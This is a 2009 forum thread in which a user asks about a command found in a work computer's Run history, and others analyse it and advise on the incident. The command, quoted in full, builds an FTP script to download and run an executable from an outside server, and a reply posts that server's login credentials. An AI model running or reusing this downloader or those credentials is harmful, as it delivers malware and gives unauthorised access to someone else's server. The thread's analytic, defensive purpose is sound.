3TeK Posted July 21, 2009 Share Posted July 21, 2009 so i jumped on one of my computers at work today and went to start>run and i see this in the run line cmd /c echo open ftp.r3kot.com 21 >> ik &echo user active@r3kot.com ;jwtc9lV?i{- >> ik &echo binary >> ik &echo get svhost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svhost.exe &exit anyone got any ideas what that did exactly? i figured it got hacked so i wiped the computer and put linux on there, lol Quote Link to comment Share on other sites More sharing options...
Sparda Posted July 21, 2009 Share Posted July 21, 2009 ftp://active@r3kot.com@ftp.r3kot.com/ password is: ;jwtc9lV?i{- and it downloads svchost.exe According to virus total a number of antivirus spot it as some thing bad. you can change stuff on that ftp site... fun. http://www.virustotal.com/analisis/abb4c43...ea51-1248202364 Quote Link to comment Share on other sites More sharing options...
digip Posted July 21, 2009 Share Posted July 21, 2009 Whoever it was, was dumb enough to not erase their tracks if they did it from the run prompt. I'm sure it cna be narrowed down to specific people at your work. Also, the fact that they were downloading malware means they inteded to do something to your company, you should bring it to the attention of your boss as well as security(if you have any) and make sure they know it wasn't you who did it, since it was on the machine you sit at, you could be blamed for it! Just scanned it at VT, and it found nothing: http://www.virustotal.com/analisis/c12911d...1893-1247962693 Maybe changed the file from the one sparda grabbed. Inspeciting it more, it looks like a packed firefox with changed icons to look like a microsoft installer, but that could be someone tyrign to make it look like something else. This is what I see in the file: http://www.twistedpairrecords.com/digip/svchost-ftp.jpg And google returns similar results for firefox installers: http://www.google.com/search?hl=en&q=f...G=Google+Search edit: The md5 hash confirms it is firefox saved as svchost.exe: 0d39ccd077bc5fec7fccf063a6bc0e9b ./win32/en-GB/Firefox Setup 3.5.1.exe http://releases.mozilla.org/pub/mozilla.or...est-3.5/MD5SUMS Quote Link to comment Share on other sites More sharing options...
3TeK Posted July 21, 2009 Author Share Posted July 21, 2009 thanks for all the info, i really appreciate the help. it a computer at our data center that one of the other guys uses and my office is across the street, so i'm hardly ever there. plus im smarter than that to leave the command line there, lol. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.